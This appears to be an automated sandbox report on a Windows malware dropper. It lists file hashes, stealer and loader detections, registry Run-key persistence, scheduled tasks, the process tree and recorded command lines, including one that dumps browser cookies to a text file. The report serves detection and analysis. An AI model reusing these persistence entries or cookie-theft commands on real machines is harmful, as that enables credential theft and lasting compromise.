SHA1 5b0c9e7b4a95d4729e62d106dbf89cb72919e64a
SHA256 d22e667e3f813d044ab2f69ba255c01cc847e7104760bff7a404875bc3ba67df
SHA512 25a4dc0f77293e90c08576b8066d0fb9238763eed0451b96b0e4c3b2daeb51935d699f256c1e505b7cfa986abfde840ba07543d944ab1c79adde91fb5726e3af

memory/1544-155-0x0000000000200000-0x0000000000201000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_5.exe

MD5 f9de3cedf6902c9b1d4794c8af41663e
SHA1 0439964dbcfa9ecd68b0f10557018098dcb6d126
SHA256 ce745112067479db4711a5f2c67706b9ab6423e5b5ffe58037e72286aabef338
SHA512 aa5f010a5decb5b2a620fe567f891984a3c7bdd2962cb452e3edda7ecc1ef742ab58cdbe7f1d7d5b28b39b606ccd52b66ad21d2cb2a22ea34ef50202854d2c31

memory/1384-158-0x0000000000AA0000-0x0000000000AA1000-memory.dmp

memory/1544-160-0x0000000000410000-0x0000000000411000-memory.dmp

\Users\Admin\AppData\Local\Temp\CC4F.tmp

MD5 d124f55b9393c976963407dff51ffa79
SHA1 2c7bbedd79791bfb866898c85b504186db610b5d
SHA256 ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
SHA512 278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

memory/1544-157-0x000000001AFE0000-0x000000001AFE2000-memory.dmp

memory/1544-156-0x0000000000440000-0x0000000000463000-memory.dmp

memory/1536-162-0x00000000003C0000-0x00000000003C9000-memory.dmp

memory/1536-163-0x0000000000400000-0x000000000088F000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

memory/1544-147-0x0000000000070000-0x0000000000071000-memory.dmp

memory/1384-146-0x0000000000000000-mapping.dmp

memory/1356-138-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_7.exe

MD5 2eb68e495e4eb18c86a443b2754bbab2
SHA1 82a535e1277ea7a80b809cfeb97dcfb5a5d48a37
SHA256 a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf
SHA512 f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

memory/640-129-0x0000000000B40000-0x0000000000B41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

memory/1544-126-0x0000000000000000-mapping.dmp

memory/1788-121-0x0000000000000000-mapping.dmp

memory/432-124-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_3.exe

MD5 7c42c04a6e95c6b494018be20ef811dc
SHA1 126d1bce056ae6ba2cea63815f6465450a1a6339
SHA256 f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69
SHA512 2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

memory/640-117-0x0000000000000000-mapping.dmp

memory/900-120-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_1.exe

MD5 6e43430011784cff369ea5a5ae4b000f
SHA1 5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f
SHA256 a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a
SHA512 33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_4.exe

MD5 aebba1a56e0d716d2e4b6676888084c8
SHA1 fb0fc0de54c2f740deb8323272ff0180e4b89d99
SHA256 6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b
SHA512 914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

memory/1536-115-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\7zS44550A84\sonia_2.exe

MD5 9f569d0eae949d683725de7bbe893eb8
SHA1 e4696b870a5a9d06585df259e8ee80f4b2364823
SHA256 273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a
SHA512 94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

memory/432-165-0x0000000002160000-0x00000000021FD000-memory.dmp

memory/1220-164-0x0000000002B20000-0x0000000002B35000-memory.dmp

memory/1420-109-0x0000000000000000-mapping.dmp

memory/632-106-0x0000000000000000-mapping.dmp

memory/1808-167-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Chrome2.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

memory/1736-173-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

MD5 ab5eae79062ddedb6715c265dddd9044
SHA1 254a9f7bd992f0e2dd1c33dc03db60050402df84
SHA256 8a87cc9fab38ab661ed147f2b39b85582e9ee7671006780f528d6fddb377f75f
SHA512 28e2568646d8a103e138a0f5bc15a785aeb6b41f87c30be9db556c4baf58a25902bb94cb72d861cbfc24f3829342d50ce891e0637ccd04ac9252abe60b33ab4d

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

MD5 6e61e25e7dc311d34b4a37e9c42d4079
SHA1 f623f0c66d599a12677cabcb0140034b5cf969bf
SHA256 55366854ece30f35d98d54b9fdfd48b0c4482bdfd4aacb59c78ccde8ce89bd9d
SHA512 da2f50a9139bcaa89680d939b905187574d2b84b89436f570c2e218680dad5c3d880cfc9e434f26c059d6602a334f2488afae4e9b92fcdc022928164400b7314

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

MD5 6e61e25e7dc311d34b4a37e9c42d4079
SHA1 f623f0c66d599a12677cabcb0140034b5cf969bf
SHA256 55366854ece30f35d98d54b9fdfd48b0c4482bdfd4aacb59c78ccde8ce89bd9d
SHA512 da2f50a9139bcaa89680d939b905187574d2b84b89436f570c2e218680dad5c3d880cfc9e434f26c059d6602a334f2488afae4e9b92fcdc022928164400b7314

memory/1740-183-0x0000000001380000-0x0000000001381000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/1548-189-0x0000000001330000-0x0000000001331000-memory.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/1740-191-0x0000000000140000-0x0000000000141000-memory.dmp

memory/432-182-0x0000000000400000-0x00000000008EB000-memory.dmp

memory/1740-177-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

MD5 6e61e25e7dc311d34b4a37e9c42d4079
SHA1 f623f0c66d599a12677cabcb0140034b5cf969bf
SHA256 55366854ece30f35d98d54b9fdfd48b0c4482bdfd4aacb59c78ccde8ce89bd9d
SHA512 da2f50a9139bcaa89680d939b905187574d2b84b89436f570c2e218680dad5c3d880cfc9e434f26c059d6602a334f2488afae4e9b92fcdc022928164400b7314

memory/1548-178-0x0000000000000000-mapping.dmp

memory/1740-192-0x0000000000150000-0x0000000000173000-memory.dmp

memory/1736-175-0x000007FEFC4A1000-0x000007FEFC4A3000-memory.dmp

memory/1740-193-0x0000000000180000-0x0000000000181000-memory.dmp

memory/1740-194-0x000000001B060000-0x000000001B062000-memory.dmp

memory/1808-170-0x000000013FEC0000-0x000000013FEC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

\Users\Admin\AppData\Local\Temp\Install2.EXE

MD5 ab5eae79062ddedb6715c265dddd9044
SHA1 254a9f7bd992f0e2dd1c33dc03db60050402df84
SHA256 8a87cc9fab38ab661ed147f2b39b85582e9ee7671006780f528d6fddb377f75f
SHA512 28e2568646d8a103e138a0f5bc15a785aeb6b41f87c30be9db556c4baf58a25902bb94cb72d861cbfc24f3829342d50ce891e0637ccd04ac9252abe60b33ab4d

memory/1548-195-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

memory/1808-196-0x000000001B970000-0x000000001B972000-memory.dmp

memory/1808-197-0x0000000000550000-0x000000000055A000-memory.dmp

memory/1660-198-0x0000000000000000-mapping.dmp

memory/1648-199-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

MD5 a20ebb2a10324b073fd40110d9ee705d
SHA1 33cf4d5e7bc35f9ef524ad9eb38c9e229ea128f1
SHA256 e6cb7b6bd4848499533b29bdf85f60e362df435c6254d74521ad40dddfb77d1a
SHA512 797dcb7dcc6cbfeadc65816ce1bc6dc140fcf7f7255b78cbb26702904af0853e97b614de3d958c3646e2d3f65417d923588836e3c745a50b767ff3db0706ae84

memory/1900-202-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Roaming\system64.exe

MD5 1eba952dd3974898cd98fbc8807b6929
SHA1 963289ab1f6af6b34fc596bb0464947e230db350
SHA256 6725aa9db031f924217cc47b78f53f03aafa329eb15906a910f21abc05116315
SHA512 18a23964951d6ba123f92b53cef1e70f4840803675c884ae4f128e55eecb6667ad456b164ca9ff47eaf01256ad0d46de69c520b16ab5af58175c13e759c20397

memory/1900-203-0x000000013F260000-0x000000013F261000-memory.dmp

memory/1556-206-0x0000000000417E02-mapping.dmp

memory/1556-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1924-210-0x0000000000000000-mapping.dmp

memory/1724-213-0x0000000000000000-mapping.dmp

memory/1572-214-0x0000000000000000-mapping.dmp

memory/1500-211-0x0000000000000000-mapping.dmp

memory/1900-209-0x000000001B720000-0x000000001B722000-memory.dmp

memory/2076-215-0x0000000000000000-mapping.dmp

memory/2156-217-0x0000000000000000-mapping.dmp

memory/2192-218-0x0000000000000000-mapping.dmp

memory/2304-220-0x0000000000000000-mapping.dmp

memory/2392-222-0x0000000000000000-mapping.dmp

memory/2448-224-0x0000000000000000-mapping.dmp

memory/2592-226-0x0000000000000000-mapping.dmp

memory/2628-228-0x0000000000000000-mapping.dmp

memory/2684-234-0x0000000000000000-mapping.dmp

memory/2764-235-0x0000000000000000-mapping.dmp

memory/2744-233-0x0000000000000000-mapping.dmp

memory/2704-231-0x0000000000000000-mapping.dmp

memory/2696-230-0x0000000000000000-mapping.dmp

memory/2800-238-0x0000000000000000-mapping.dmp

memory/2812-239-0x0000000000000000-mapping.dmp

memory/2824-240-0x0000000000000000-mapping.dmp

memory/2780-236-0x0000000000000000-mapping.dmp

memory/2732-232-0x0000000000000000-mapping.dmp

memory/2876-247-0x0000000000000000-mapping.dmp

memory/2844-242-0x0000000000000000-mapping.dmp

memory/2928-251-0x0000000000000000-mapping.dmp

memory/2920-250-0x0000000000000000-mapping.dmp

memory/2140-262-0x0000000000000000-mapping.dmp

memory/240-260-0x0000000000000000-mapping.dmp

memory/632-258-0x0000000000000000-mapping.dmp

memory/2844-268-0x0000000004550000-0x0000000004551000-memory.dmp

memory/2016-261-0x0000000000000000-mapping.dmp

memory/2024-259-0x0000000000000000-mapping.dmp

memory/1428-269-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2021-07-22 23:31

Reported

2021-07-22 23:33

Platform

win10v20210410

Max time kernel

6s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rUNdlL32.eXe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rUNdlL32.eXe

RedLine

infostealer redline

RedLine Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Socelars

stealer socelars

Socelars Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar

stealer vidar

suricata: ET MALWARE GCleaner Downloader Activity M1

suricata

suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

suricata

suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

suricata

suricata: ET MALWARE Win32/Ficker Stealer Activity M3

suricata

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Cryptocurrency Miner

miner

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe N/A
Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce C:\Users\Admin\AppData\Local\Temp\Install2.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\Install2.EXE N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3244 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe
PID 3244 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe
PID 3244 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe
PID 2620 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3224 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3696 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3952 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 372 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3852 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2620 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3696 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe
PID 3696 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe
PID 3696 wrote to memory of 3708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe
PID 4076 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe
PID 4076 wrote to memory of 3092 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe
PID 3104 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe
PID 3104 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe
PID 3104 wrote to memory of 1192 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe
PID 3224 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 3224 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 3224 wrote to memory of 2976 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 3952 wrote to memory of 2124 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe
PID 2356 wrote to memory of 2120 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe
PID 372 wrote to memory of 812 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe
PID 3852 wrote to memory of 1864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe
PID 1192 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
PID 2976 wrote to memory of 2156 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe
PID 1192 wrote to memory of 2904 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\Install2.EXE
PID 1192 wrote to memory of 3944 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
PID 2904 wrote to memory of 2644 N/A C:\Users\Admin\AppData\Local\Temp\Install2.EXE C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
PID 1864 wrote to memory of 4212 N/A C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe

"C:\Users\Admin\AppData\Local\Temp\7E03737D683BC19280A5DC25BEFC85B6.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_2.exe

sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_5.exe

sonia_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_3.exe

sonia_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_4.exe

sonia_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_6.exe

sonia_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe

sonia_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\Chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\Install2.EXE

"C:\Users\Admin\AppData\Local\Temp\Install2.EXE"

C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe

"C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_7.exe

sonia_7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCAC60004\sonia_8.exe

sonia_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sonia_2.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

